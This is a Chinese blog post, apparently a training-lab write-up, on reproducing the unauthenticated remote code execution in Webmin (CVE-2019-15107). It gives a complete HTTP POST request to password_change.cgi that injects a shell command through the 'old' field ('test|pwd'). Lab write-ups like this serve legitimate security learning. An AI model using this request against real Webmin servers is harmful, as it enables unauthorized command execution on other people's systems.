当前位置:网站首页>墨者学院-Webmin未经身份验证的远程代码执行
墨者学院-Webmin未经身份验证的远程代码执行
2022-07-04 07:40:00 【Lyswbb】
首先拿到靶场后进行访问,访问后来到一个登陆页面
根据题目可知,未授权的rce,所以可以先找一下历史CVE编号(CVE-2019-15107),找到之后直接对漏洞进行一个复现,漏洞点在密码重置功能出:Webmin--Webmin confuration--Authentication
burp抓取流量包,然后修改参数,注意需要把session_login.cgi改成password_change.cgi,下面的参数直接复制就行,这个漏洞点的触发只需要传一个expired参数执行命令即可
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
直接查询根下的key.txt即可
边栏推荐
- Comparison between applet framework and platform compilation
- 线性代数1.1
- Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!
- 2022-021ARTS:下半年开始
- [kubernetes series] kubesphere is installed on kubernetes
- OKR vs. KPI figure out these two concepts at once!
- [C language] open the door of C
- Electronic Association C language level 1 35, bank interest
- Transition technology from IPv4 to IPv6
- flask-sqlalchemy 循环引用
猜你喜欢
Distributed transaction management DTM: the little helper behind "buy buy buy"
Go learning notes - constants
User login function: simple but difficult
This monitoring system can monitor the turnover intention and fishing all, and the product page has 404 after the dispute appears
如何用MOS管来实现电源防反接电路
Zephyr 学习笔记2,Scheduling
![[Flink] temporal semantics and watermark](/img/4d/cf9c7e80ea416155cee62cdec8a5bb.jpg)
[Flink] temporal semantics and watermark
【森城市】GIS数据漫谈(一)
The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
Introduction to rce in attack and defense world
随机推荐
Oceanbase is the leader in the magic quadrant of China's database in 2021
L1-027 rental (20 points)
The IP bound to the socket is inaddr_ The meaning of any htonl (inaddr_any) (0.0.0.0 all addresses, uncertain addresses, arbitrary addresses)
Amd RX 7000 Series graphics card product line exposure: two generations of core and process mix and match
Tri des fonctions de traitement de texte dans MySQL, recherche rapide préférée
Linear algebra 1.1
[Mori city] random talk on GIS data (I)
MySQL中的文本处理函数整理,收藏速查
Recursive Fusion and Deformable Spatiotemporal Attention for Video Compression Artifact Reduction
Valentine's Day is coming! Without 50W bride price, my girlfriend was forcibly dragged away...
Two years ago, the United States was reluctant to sell chips, but now there are mountains of chips begging China for help
SQL注入测试工具之Sqli-labs下载安装重置数据库报错解决办法之一(#0{main}thrown in D:\Software\phpstudy_pro\WWW\sqli-labs-……)
University stage summary
深入浅出:了解时序数据库 InfluxDB
人生规划(Flag)
User login function: simple but difficult
How to reset IntelliSense in vs Code- How to reset intellisense in VS Code?
21个战略性目标实例,推动你的公司快速发展
Zhanrui tankbang | jointly build, cooperate and win-win zhanrui core ecology
Devops Practice Guide - reading notes (long text alarm)